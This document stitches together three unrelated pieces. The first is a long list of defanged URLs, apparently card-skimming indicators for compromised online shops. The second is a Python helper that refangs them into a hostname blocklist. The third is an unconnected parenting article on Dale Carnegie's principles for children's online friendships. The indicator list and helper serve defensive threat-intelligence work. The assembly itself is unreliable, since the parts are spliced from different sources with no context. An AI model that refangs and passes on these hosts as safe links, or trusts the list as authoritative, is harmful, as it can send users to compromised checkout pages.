URL: http://mehtagems.]com/
URL: http://www.]myengineoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://www.]mynumberplates.]com/
URL: http://www.]britoil.]co.]uk/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]fashionaxe.]com/
URL: http://philippelebac.]fr/
URL: http://hotelcathedrale.]be/
URL: http://bagsymalone.]in/
URL: https://www.]tec-heads.]com/
URL: http://www.]bowtiqueuk.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]officecorrect.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://dhyanaa.]com/
URL: https://www.]kitauto.]pt/
URL: http://hotelcathedrale.]be/
URL: http://motornets.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]ewrjuant.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]repkcory.]com/
URL: http://www.]supritam.]com/
URL: http://www.]matexbuyer.]com/
URL: http://www.]blazovic.]com/
URL: http://hotelcathedrale.]be/
URL: https://www.]kitauto.]pt/
URL: http://hotelcathedrale.]be/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://falcontraders.]co.]uk/
URL: http://designbookshop.]in/
URL: http://hotelcathedrale.]be/
URL: http://www.]mslzaric.]com/
URL: http://www.]clairnewt.]com/
URL: https://www.]denimvenim.]com/
URL: http://www.]coslflybiod.]com/
URL: http://www.]mirnkola.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: https://www.]solaroutdoorlightingdisplay.]com/
URL: http://www.]airckmoaw.]com/
URL: http://doctor-alcrimea.]ru/
URL: https://herbaloja.]online/
URL: http://pharmatrades.]com/
URL: http://www.]nadiarey.]com/
URL: http://coitoys.]com/
URL: http://oculosdahora.]com.]br/
URL: http://om10.]ru/
URL: http://www.]treosportswear.]com/
URL: http://shopgbpi.]co.]uk/
URL: https://www.]niwuma.]com/
URL: http://www.]hoaquathanhhang.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]farmcraft.]at/
URL: http://bookmyo.]com/
URL: http://masterlyweft.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://www.]bukserhe.]com/
URL: http://smallpenfactory.]com.]au/
URL: http://www.]autocleaningbrunssum.]nl/
URL: http://www.]laboutiqueachapeaux.]com/
URL: http://batubati.]hu/
URL: http://demolicaomoveis.]com.]br/
URL: http://www.]superdin.]com.]br/
URL: http://www.]tonyonlinestore.]com/
URL: http://www.]descontosemhoteis.]com.]br/
URL: http://garudakart.]com/
URL: http://jutebazaar.]com/
URL: http://www.]leilachodo.]com/
URL: http://newstudytour.]com/
URL: http://www.]zamarimarcondes.]com.]br/
URL: http://fisiolifepilates.]com.]br/
URL: https://dload.]com.]br/
URL: http://hotelcathedrale.]be/
URL: http://kiiroousa.]com/
URL: http://designbookshop.]in/
URL: http://hotelcathedrale.]be/
URL: https://www.]baleyo.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://oomph.]com.]sg/
URL: http://hotelcathedrale.]be/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]myengineoil.]co.]uk/
URL: http://www.]britoil.]co.]uk/
URL: http://www.]myvanaccessories.]co.]uk/
URL: https://www.]ezy-care.]co.]uk/
URL: http://english-furniture.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]matexbuyer.]com/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://aquasport.]sigmacell.]in/
URL: http://hotelcathedrale.]be/
URL: http://worldstogether.]com/
URL: http://www.]matexbuyer.]com/
URL: https://www.]arenaflorist.]com/
URL: http://www.]blendystraw.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://hotelcathedrale.]be/
URL: http://www.]arquegym.]com.]br/
URL: http://hotelcathedrale.]be/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: https://www.]paudicesrl.]it/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]reviewlista.]com/
URL: https://www.]khadiindia.]in/
URL: http://www.]kupu.]es/
URL: http://hotelcathedrale.]be/
URL: https://magesource.]su/
URL: http://www.]nurserydecalsandmore.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://www.]myvanaccessories.]co.]uk/
URL: http://www.]mynumberplates.]com/
URL: https://myphonetics.]com/
URL: http://www.]myengineoil.]co.]uk/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]opticalsupplies.]com/
URL: https://www.]ezy-care.]co.]uk/
URL: http://www.]britoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://www.]doftec.]com/
URL: http://garudakart.]com/
URL: http://legalprintllc.]com/
URL: http://lukasandlara.]com/
URL: http://hotelcathedrale.]be/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://hotelcathedrale.]be/
URL: https://myphonetics.]com/
URL: http://alltradeshowdisplay.]com/
URL: http://www.]virmans.]com/
URL: http://www.]gramton.]com/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://www.]thevintagegrapes.]com/
URL: http://english-furniture.]co.]uk/
URL: http://stonemanasia.]com/
URL: http://jacksvapes.]com/
URL: http://unsquashaball.]com/
URL: https://www.]eyewear69.]my/
URL: http://www.]vandrugboards.]com/
URL: http://qandmantiqueluxury.]com/
URL: http://hivepackaging.]com/
URL: http://www.]4d-printology.]com/
URL: http://hotelcathedrale.]be/
URL: http://diamondwrapfactory.]com/
URL: http://petanyway.]net/index.%5Dphp/why-not-available/
URL: http://hotelcathedrale.]be/
URL: http://www.]lobsters.]com.]sg/
URL: https://www.]arenaflorist.]com/
URL: http://www.]mrsflorist.]co.]in/
URL: http://www.]loosen-up.]com/
URL: http://labdooshoes.]com/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://hotelcathedrale.]be/
URL: https://www.]paudicesrl.]it/
URL: http://hotelcathedrale.]be/
URL: http://eshop.]wengthyelot54.]com/
URL: https://mustardoc.]com/
URL: http://hotelcathedrale.]be/
URL: https://electroshopnow.]com/
URL: http://kmmachinery.]com/
URL: http://kmglasstools.]com/
URL: http://hotelcathedrale.]be/
URL: http://dealelement.]com/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]xentogo.]com/
URL: http://hotelcathedrale.]be/
URL: http://shoefactoryindia.]com/
URL: http://hotelcathedrale.]be/
URL: http://solarinfrasystems.]com/
URL: https://electroshopnow.]com/
URL: https://www.]macroman.]in/
URL: http://juwelier-tarasek.]de/
URL: https://dourosoptika.]gr/
URL: https://www.]straightfromfarmers.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://www.]uiterkits.]com/
URL: http://de-lices.]ru/
URL: http://hotelcathedrale.]be/
URL: http://store.]uggtasman.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://rpkorea.]com/
URL: https://www.]sellsspares.]com/
URL: http://www.]fashionaxe.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://fenxiangheaven.]com/
URL: http://www.]i91cloud.]com/
URL: https://www.]ikonmotorsports.]com/
URL: https://gorusticx.]com/
URL: http://www.]lobsters.]com.]sg/
URL: http://www.]ororganicliving.]com/
URL: http://www.]lifestylea-list.]com/
URL: http://www.]grovz.]com/
URL: http://diamondwrapfactory.]com/
URL: http://omniscrubs.]com/
URL: http://www.]4d-printology.]com/
URL: http://www.]northhillco.]com/
URL: http://devdantona.]com/
URL: http://deeprosso.]com/
URL: http://www.]fashionaxe.]com/
URL: http://www.]iousi.]com.]cn/
URL: http://hotelcathedrale.]be/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://www.]eurekacosmetics.]com/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://www.]virmanishop.]com/
URL: http://goofballstuff.]com/
URL: http://hotelcathedrale.]be/
URL: http://om10.]ru/
URL: http://www.]nurserydecalsandmore.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
URL: http://hotelcathedrale.]be/
URL: https://www.]ikonmotorsports.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]cityflorist.]co.]in/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://goldwithyou.]com/
URL: http://hotelcathedrale.]be/
URL: https://herbaloja.]online/
URL: http://www.]surprise.]ps/
URL: http://hotelcathedrale.]be/
URL: http://store.]curiousinventor.]com/
URL: http://www.]magento.]flyermonster.]de/
URL: http://hotelcathedrale.]be/
URL: https://deals4kart.]com/
URL: http://academycreative.]cz/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://cuberra.]eu/
URL: http://hotelcathedrale.]be/
URL: https://www.]smclinic.]bg/
URL: http://shoefactoryindia.]com/
URL: http://www.]fiskrose.]com/
URL: https://myworldphone.]com/
URL: https://www.]khadiindia.]in/
URL: http://www.]kevinbuou.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]ajshoes.]top/index.]php?route=checkout/checkout
URL: https://deals4kart.]com/
URL: http://www.]fangshicube.]com/
URL: http://www.]gpmbv.]com/
URL: http://va-store.]de/
URL: http://www.]webshopsmagento.]nl/
URL: http://jewelsofdesert.]com/
URL: http://www.]khadioutlet.]com/
URL: http://lequeens.]com/
URL: http://stilprinzessin.]com/
URL: http://www.]doreall.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]fangshicube.]com/
URL: http://luggagemama.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://cyprusitstore.]com/
URL: https://deals4kart.]com/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]ajshoes.]top/index.]php?route=checkout/checkout
URL: http://hotelcathedrale.]be/
URL: http://www.]myvanaccessories.]co.]uk/
URL: http://www.]arquegym.]com.]br/
URL: http://www.]britoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: https://www.]chirobuddy.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]electricalswholesale.]co.]uk/
URL: http://www.]matexbuyer.]com/
URL: http://www.]webshopsmagento.]nl/
URL: https://www.]straightfromfarmers.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://www.]doreall.]com/
URL: https://pinkime.]com/
URL: https://www.]websun.]us/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://store.]curiousinventor.]com/guides/Surface_Mount_Soldering/Tools
URL: http://www.]electricalswholesale.]co.]uk/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://magesource.]su/
URL: http://magesource.]su/
URL: http://magesource.]su/
URL: http://only16.]net/
URL: http://labdooshoes.]com/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://om10.]ru/
URL: http://lequeens.]com/
URL: http://www.]athleticmmagear.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]almosauto.]in/
URL: http://douspeakgreen.]in/
URL: http://www.]eurekacosmetics.]com/
URL: http://hotelcathedrale.]be/
URL: http://coripa.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]tribalasia.]com.]my/
URL: http://hotelcathedrale.]be/
URL: https://www.]xinginroo.]com/
URL: http://magesource.]su/
URL: https://www.]khadiindia.]in/
URL: http://www.]supritam.]com/
URL: http://magesource.]su/
URL: http://store.]curiousinventor.]com/
URL: http://www.]blendystraw.]com/
URL: http://www.]barcoderfidstore.]com/
URL: http://douspeakgreen.]in/
URL: http://fashionfromla.]com/
URL: http://seasonallivingokc.]com/
URL: http://floorzndoorz.]com/
URL: http://formula-depot.]com/
URL: http://zigoh.]com/
URL: https://www.]baleyo.]com/
URL: http://luggagemama.]com/
URL: http://magesource.]su/
URL: http://hotelcathedrale.]be/
URL: http://emediks.]com/store/
URL: http://www.]fashionaxe.]com/
URL: http://schrikdraad.]nu/
URL: http://www.]liquidfillingpastefilling.]com/
URL: http://hotelcathedrale.]be/
URL: http://bymatty.]com/
URL: http://www.]sclabrine.]com/
URL: https://www.]bluecactus.]co/
URL: http://fashionavenue.]ma/
URL: http://yesforlov.]sk/
URL: https://vytunuj.]sk/
URL: http://www.]nflskjor.]com/
URL: http://www.]acolortree.]com/
URL: https://cobrafashions.]com/
URL: http://www.]wondershop.]in/
URL: http://sockitupsocks.]com/
URL: http://richbumlife.]com/
URL: http://gypsygfashionaccessories.]com/
URL: https://www.]bvsecurity.]com/
URL: http://www.]fiskrose.]com/
URL: https://espacomanix.]com.]br/
URL: http://www.]nixim3dpuzzle.]com/
URL: http://www.]almosauto.]in/
URL: http://www.]mage-apps.]de/
URL: http://budstok.]com.]ua/
URL: http://stage.]citizencashmere.]com/
URL: http://www.]nitazdesign.]com/
URL: http://goldwithyou.]com/
URL: http://chkmaid.]com/
URL: http://www.]mattiaus.]com/
URL: http://www.]hcgsci.]com/
URL: http://eshop.]wengthyelot54.]com/
URL: http://bartonwest.]com/
URL: http://gravurator.]de/
URL: http://platz.]com.]ua/
URL: https://5eboard.]com/
URL: http://khadder.]in/
URL: https://novnation.]com/
URL: https://www.]taptye.]com/
URL: https://seelar.]com/
URL: http://www.]1quickcomp.]com/
URL: http://pinul.]com/
URL: http://www.]99materials.]com/
URL: http://southernvapor.]com/
URL: http://www.]pejenterprisesinc.]com/
URL: http://www.]ejoyeeta.]com/
URL: http://www.]retailsigningsolutions.]com/
URL: http://www.]fyringe.]com/
URL: http://www.]suninbox.]co.]uk/
URL: http://www.]gohoyo.]com/
URL: http://eveday.]com/
URL: https://www.]el-taller.]pe/
URL: https://www.]dazzstyle.]com/
URL: http://montecitocaviar.]com/
URL: http://www.]togotelecom.]ca/
URL: http://swimresearch.]com/
URL: https://eighteditions.]com/
URL: https://srmall.]net/
URL: https://hyperstrength.]com/
URL: https://www.]gardenarteu.]com/
URL: http://deltanineclothing.]com/
URL: http://www.]storerab.]com/
URL: http://floorzndoorz.]com/
URL: http://4girlsaccessories.]com/
URL: http://www.]cityflorist.]co.]in/
URL: http://faithandflags.]com/
URL: https://www.]theaugustco.]com/
URL: http://francomotorsports.]com/
URL: http://www.]reviewlista.]com/
URL: http://www.]luckystarparty.]com/
URL: http://www.]interprice.]mx/
URL: http://www.]xxlgrip.]com/
URL: http://avstamps.]com/
URL: https://www.]baleyo.]com/
URL: http://www.]905wood.]com/
URL: https://www.]macroman.]in/
URL: http://cuberra.]eu/
URL: https://www.]velmo.]com/
URL: https://wonderna.]com/
URL: http://www.]spectrumlites.]co.]in/
URL: http://kupi-present.]ru/
URL: http://plumbedright.]com/
URL: http://equibuy.]es/
URL: https://www.]tec-heads.]com/
URL: http://advancehealthproducts.]com.]au/
URL: http://www.]inflatable-zone.]org/
URL: https://dermagold.]sg/
URL: http://www.]ibericos.]es/
URL: http://worldstogether.]com/
URL: http://www.]reflect-store.]com/
URL: http://www.]kaajalsarees.]com/
URL: http://www.]arquegym.]com.]br/
URL: http://www.]benzin-im-blut.]com/
URL: http://www.]ladago.]co.]uk/
URL: http://clonadipet.]com.]br/
URL: http://www.]louboutinuk.]co.]uk/
URL: https://onestophairandbeauty.]ie/
URL: http://www.]jensalwholesale.]com/
URL: https://www.]chirobuddy.]net/
URL: http://tile.]tilesandiego.]com/
URL: https://morrio.]com/
URL: http://cadresrobain.]fr/
URL: http://www.]petzy.]com.]au/
URL: http://www.]dysin.]com/
URL: http://buyvipbaby.]com/login/
URL: http://www.]olisano.]com/
URL: http://www.]thevintagegrapes.]com/
URL: http://www.]ludoville.]it/
URL: http://zigoh.]com/
URL: http://usacontainergroup.]com/
URL: https://www.]clinicallearning.]com/index.]php/
URL: http://www.]farmcraft.]at/
URL: http://www.]poyood.]com/
URL: http://euromigracija.]lt/
URL: http://goofballstuff.]com/
URL: https://www.]enlivenglobal.]com/
URL: http://www.]turyagatea.]com/
URL: http://creekfire.]com/
URL: http://nowknow.]ch/
URL: http://vkconline.]com/
URL: https://trinitysurvival.]com/
URL: http://www.]eboxim.]com/
URL: http://www.]ilovedelfruito.]com/
URL: http://www.]danatsouq.]com/
URL: https://www.]callidae.]com/
URL: https://www.]tramit.]it/
URL: http://jjnc.]com.]hk/
URL: http://shop.]taketime.]ch/
URL: https://lacnehry.]sk/
URL: https://ibercorte.]com/
URL: http://www.]macmax.]com/uk/
URL: http://www.]raquelrecargas.]com.]br/
URL: http://www.]hotsca.]com/
URL: http://www.]jarab.]london/
URL: http://www.]webshopsmagento.]nl/
URL: http://start-finish.]ru/
URL: http://www.]officiel.]it/
URL: http://www.]isbbookstore.]com/
URL: http://www.]krirob.]nu/
URL: http://www.]eurekacosmetics.]com/
URL: http://kupu.]es/
URL: http://en.]lileauxbrocantes.]com/nouveautes.]html
URL: http://girlsandpearls.]com/
URL: https://www.]websun.]us/
URL: http://www.]vintageindiarishikesh.]com/
URL: http://piese-gm.]ro/
URL: http://www.]diamondsnyou.]com/
URL: http://ccgobuy.]com/
URL: http://olenobra.]com/
URL: https://www.]eternis.]pt/
URL: http://infcollection.]com/
URL: http://lojamundodosgames.]com/
URL: http://purplebluepublishing.]com/
URL: https://www.]autowheelexperts.]com/
URL: https://www.]gizell.]ro/
URL: http://smalldogsdepot.]com/
URL: http://www.]hessiansantasacks.]co.]uk/
URL: http://laborisfarma.]pl/
URL: http://fashionfromla.]com/
URL: https://www.]sellsspares.]com/
URL: http://www.]soothnshine.]com/
URL: http://jacksvapes.]com/
URL: https://www.]richgromart.]com/
URL: http://www.]safetreksales.]com/
URL: http://ibundo.]de/
URL: http://www.]megamojster.]si/
URL: http://rpkorea.]com/
URL: http://discountadda.]com/
URL: http://www.]enotecaosteriaroma.]it/
URL: http://nopainnomusa.]com/
URL: https://www.]shopforsaundarya.]com/
URL: http://accessoriesdeluxe.]com/
URL: https://www.]krausjeans.]com/
URL: http://www.]ghulamali.]com.]pk/
URL: http://www.]hardshot.]fr/
URL: http://countrystorecampinas.]com.]br/
URL: http://p-d-r.]ru/
URL: http://demo.]freelunchlabs.]com/
URL: http://atopmall.]kr/
URL: http://hurtsilvermagic.]pl/customer/account/login/
URL: https://www.]afsr-simivalley-shop.]com/
URL: http://www.]dutwsnmare.]com/
URL: http://produtosprofissionais.]com.]br/
URL: https://my.]nutis.]com/
URL: https://www.]smclinic.]bg/
URL: https://www.]wisesolutions.]net/
URL: https://davillblinds.]com/
URL: https://minervamedical.]ca/
URL: http://gamsjaga.]com/
URL: https://jceracing.]com/
URL: http://dhyanaa.]com/
URL: https://weloveheipoa.]com/
URL: http://www.]advanced-pixel-shuttle.]com/
URL: http://allright.]dp.]ua/
URL: http://trueitglobal.]com/
URL: http://www.]nandndesign.]com/
URL: http://antaraxnm.]com/
URL: http://www.]petitkreativ.]at/
URL: https://www.]crowngroup.]net.]au/shop/
URL: http://vanquish.]co.]in/
URL: http://www.]esde.]ro/
URL: https://liquidlightglows.]com/
URL: http://shop.]littleashford.]co.]za/
URL: https://lens4us.]com/
URL: https://www.]westernelitejewelry.]com/
URL: http://www.]mobilprices.]com/
URL: http://blitarzoneid.]blogspot.]com/
URL: http://kraftitude.]com/
URL: http://grupocyber.]net/
URL: http://elektro-wols.]kompass-media.]eu/
URL: http://classico.]nextmp.]net/
URL: http://www.]nationaltiledistribution.]com/
URL: http://bloomingtrails.]com/
URL: http://redcellmedical.]com/
URL: http://patesting.]ie/
URL: http://www.]bysicilia.]it/
URL: http://kibellariding.]com/
URL: https://www.]ladoudounesolde.]com/
URL: http://www.]anjelskedarceky.]sk/
URL: https://poolstore.]com.]au/
URL: http://sklepsilvermagic.]pl/
URL: http://www.]uebuys.]com/
URL: http://www.]reynsaon.]com/
URL: http://eshop.]javwireless.]com/
URL: http://alphafxtestbooster.]com/
URL: https://decor-boutique.]com/
URL: http://www.]kevinbuou.]com/
URL: https://www.]aioma.]it/
URL: http://luxuryjewelleryto.]com/
URL: http://www.]angcoshop.]com/
URL: https://www.]vayobv.]com/
URL: http://de-lices.]ru/
URL: https://democanopy.]com/
URL: https://mustardoc.]com/
URL: http://www.]gourmetgallery.]sk/
URL: http://fetchscripts.]com/
URL: http://ballcancersucks.]com/
URL: https://xtremevisionhid.]com/
URL: http://www.]brushncanvas.]com/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://www.]haitralled.]com/
URL: https://hanarovendas.]com.]br/
URL: http://www.]plasticrewards.]com/
URL: http://www.]universalbumpkeys.]com/
URL: http://zuzugadgets.]com/
URL: https://freshyeat.]com/
URL: http://alch.]it/
URL: http://asap.]co.]in/
URL: https://www.]majesticlightinginc.]com/
URL: https://www.]1by1shop.]com/
URL: https://www.]kitauto.]pt/
URL: http://sandoggrus.]dk/
URL: http://www.]shieldmans.]com/
URL: http://zapal.]com.]ua/
URL: https://www.]farmaciabovisa.]it/
URL: http://gurmanebi.]com/
URL: http://www.]sportlowcost.]it/
URL: http://www.]minopuntomoda.]com/
URL: http://mstech.]com.]au/
URL: http://magegaga.]com/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://shop-camera.]com/
URL: http://hotelcathedrale.]be/
URL: http://alltradeshowdisplay.]com/
URL: http://hikvision-ir.]com/
URL: http://shop-camera.]com/
URL: http://homelykart.]com/
URL: https://www.]bvsecurity.]com/
URL: http://mebli-z.]com/
URL: https://mustardoc.]com/
URL: https://www.]krausjeans.]com/
URL: http://www.]dutwsnmare.]com/
URL: http://www.]gramton.]com/
URL: http://usacontainergroup.]com/
URL: http://tile.]tilesandiego.]com/
URL: http://bartonwest.]com/
URL: https://www.]dazzstyle.]com/
URL: https://minervamedical.]ca/
URL: http://www.]inflatable-zone.]org/
URL: http://www.]ilovedelfruito.]com/
URL: http://www.]hotsca.]com/
URL: http://www.]uebuys.]com/
URL: http://girlsandpearls.]com/
URL: http://obeikandl.]com/
URL: http://thanhloc1.]com/
URL: http://seasonallivingokc.]com/
URL: https://www.]macroman.]in/
URL: https://www.]petremedies.]co.]uk/
URL: http://www.]hessiansantasacks.]co.]uk/
URL: http://naturagladlife.]com/
URL: http://www.]protezzla-direct.]com/nkc-ledenvoordeel/
URL: https://commercialpoolandspasupplies.]com/
URL: http://www.]sclabrine.]com/
URL: http://www.]quimex.]com.]ar/
URL: http://lojamundodosgames.]com/
URL: http://om10.]ru/
URL: http://www.]webshopsmagento.]nl/
URL: http://www.]suninbox.]co.]uk/
URL: https://www.]vayobv.]com/
URL: http://www.]louboutinuk.]co.]uk/
URL: https://www.]ikonmotorsports.]com/
URL: http://hotelcathedrale.]be/
URL: https://www.]eternis.]pt/
URL: http://www.]arquegym.]com.]br/
URL: http://fetchscripts.]com/
URL: http://petit-univers.]com/
URL: https://www.]krausjeans.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://ledrus.]co.]nz/
URL: http://obeikandl.]com/
URL: http://hotelcathedrale.]be/
URL: http://net-istore.]ro/
URL: http://www.]mrsflorist.]co.]in/
URL: http://shop-camera.]com/
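
The indicator list above is defanged with the `.]` convention, and a few entries carry encoding residue (`%5D` for `]`, a stray `%7C` pipe) from extraction. Before feeding such a list into a blocklist or a detection rule it has to be refanged and normalised. The helper below is an added example written for this page, not code from the original report: it parses `URL:` lines, refangs them, handles the `%5D`/`%7C` residue seen above, and reduces the result to per-host counts and a unique hostname blocklist. The first six sample lines are copied from the list; the `hxxp://example[.]test/` line is constructed to show the other common defanging style.

```python
"""Refang and normalise a defanged 'URL: ...' indicator list."""
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample: six lines copied from the list above plus one made-up
# hxxp://[.] entry (example.test is a reserved name, not a real indicator).
SAMPLE = """\
URL: http://store.]uggtasman.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
URL: http://www.]ajshoes.]top/index.%5Dphp?route=checkout/checkout
URL: hxxp://example[.]test/
"""


def refang(url: str) -> str:
    """Undo the usual defanging markers and the encoding residue in this list.

    '%5D' is a URL-encoded ']' (so 'index.%5Dphp' is really 'index.]php'),
    '%7C' is an encoded '|' that is pure extraction debris.
    """
    u = url.strip()
    u = u.replace("%5D", "]").replace("%7C", "").rstrip("|")
    # '[.]', '.]', '].', '[.' and '.[' are all dot markers
    u = re.sub(r"\[\.\]|\.\]|\]\.|\[\.|\.\[", ".", u)
    u = re.sub(r"^hxxp(s?)://", r"http\1://", u, flags=re.IGNORECASE)
    return u


def parse_indicators(text: str):
    """Yield refanged URLs from 'URL: ...' lines; any other line is ignored."""
    for line in text.splitlines():
        m = re.match(r"^\s*URL:\s*(\S+)", line)
        if m:
            yield refang(m.group(1))


def hostnames(text: str) -> Counter:
    """Count occurrences per hostname, so repeated entries are kept as a count
    rather than silently dropped."""
    counts = Counter()
    for url in parse_indicators(text):
        host = urlsplit(url).hostname
        if host:
            counts[host.lower()] += 1
    return counts


def blocklist(text: str) -> list:
    """Unique, sorted hostnames suitable for a DNS sinkhole or proxy blocklist."""
    return sorted(hostnames(text))


if __name__ == "__main__":
    for host, n in hostnames(SAMPLE).most_common():
        print(f"{n:3d}  {host}")
```

Matching on the hostname rather than the full URL is deliberate: the skimmer paths in the list (`index.php`, `checkout/checkout`) are ordinary shop pages, so a path-level rule would miss the same host serving the injection from a different page. The refang step intentionally only recognises the bracket and `hxxp` conventions; if a feed uses a different scheme, extend the regular expression rather than stripping characters blindly, or legitimate `[`/`]` in query strings will be mangled.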

Timeless Principles to Help Your Child Develop Social Superpowers


“You can make more friends in two months by becoming interested in other people than you can in two years by trying to get other people interested in you.” ~ Dale Carnegie

Each year it’s my tradition to re-read a handful of books that continue to shape my perspective. One of those books is the 1936 self-help classic, How to Win Friends and Influence People by Dale Carnegie.

I’ll admit, I’ve never liked the book’s overly-schmoozy title, but its content is gold. And 84 years later, it’s still relevant to our ongoing family discussion of how to model leadership and get a more meaningful return on our digital connections.

Slow down, look around

It has become easy, and almost habitual, to move fast, skim content, and make quick judgments. We upload details about ourselves, our opinions, our activities, our agendas, our wins.

Carnegie’s approach (condensed and paraphrased): Slow down and look around. Take a genuine interest in the people around you. Make room for different points of view. Steer clear of drama, criticizing others, and conflict. And never make anyone feel “less than.”

Social superpowers

Carnegie’s principles, applied online, are tools parents can use to help kids develop their social superpowers. The simple act of slowing down and listening instead of clicking is a big step toward more genuine connections.

On the safety side, slowing down can help kids become more aware of and avoid threats such as cyberbullying, scams, catfishing, and online conflict.

Here are a few more Carnegie power tips (condensed and paraphrased) to help build up your family’s social superpowers.

More meaningful connections

Take a genuine interest in others. “If we want to make friends, let’s do things for other people – things that require time, energy, unselfishness, and thoughtfulness.”

Encourage your child to step out of the “selfie” mindset as a first step in forming more genuine friendships online (as opposed to amassing followers). Brainstorm ways to do this. Maybe it’s more face-to-face time with known friends, keeping track of other people’s birthdays, and hand-writing cards and sending them in the mail. Paying attention to the details of a person’s life — their hobbies, family members, values, and goals — is the heartbeat of a real friendship.

Smile, be welcoming. “Actions speak louder than words, and a smile says, ‘I like you. You make me happy. I am glad to see you.’”

Sounds simple, but a smile — in this case, the way we welcome others online — can go a long way. The attitude we express through our online interactions can make or break our relationships and reputation.

Encourage your child to review and delete negative or harmful content that lacks a spirit of inclusion and kindness. Our social profiles may be the first impression others — including teachers, colleges, and employers — may have of us.

Another plus: Choosing a digital “smile” when we post (over drama and making fun) sends a powerful message that can ease cyberbullying, build empathy, and be a source of strength for others who may be struggling.

Note: Choosing to smile online as a general principle doesn’t include faking it or only sharing a heavily-edited or overly positive version of your life. Be real. Be honest. Be you.

Affirm others. “. . . a sure way to [people’s] hearts is to let them realize in some subtle way that you realize their importance and recognize it sincerely.”

Every person on the planet has a fundamental need to be noticed and feel valued. With the amount of anxiety, depression, body image issues, and cyberbullying kids face online, what young person couldn’t use a genuine word of encouragement?

Discuss the many ways to affirm others on and offline. Encourage your child to be aware of and willing to compliment the strengths of others, cheer on accomplishments, and support a cause or passion they’ve expressed.

Avoid arguments and criticizing others. “Criticism is dangerous because it wounds a person’s precious pride, hurts his [or her] sense of importance, and arouses resentment.”

If we could all master these two Carnegie principles online, the world’s collective mental health might be on a happier, healthier trajectory.

Encourage your child to pay attention to his or her emotions and avoid engaging others if they feel angry, anxious, or tired. Discuss the importance of empathy and forgiveness. Challenge them to allow others to express their ideas without judgment.

Avoiding conflict doesn’t mean you ignore injustice or become a doormat. On the contrary, responding with grace in a tense situation requires strength and self-control — especially when it comes to trolls and bullies.

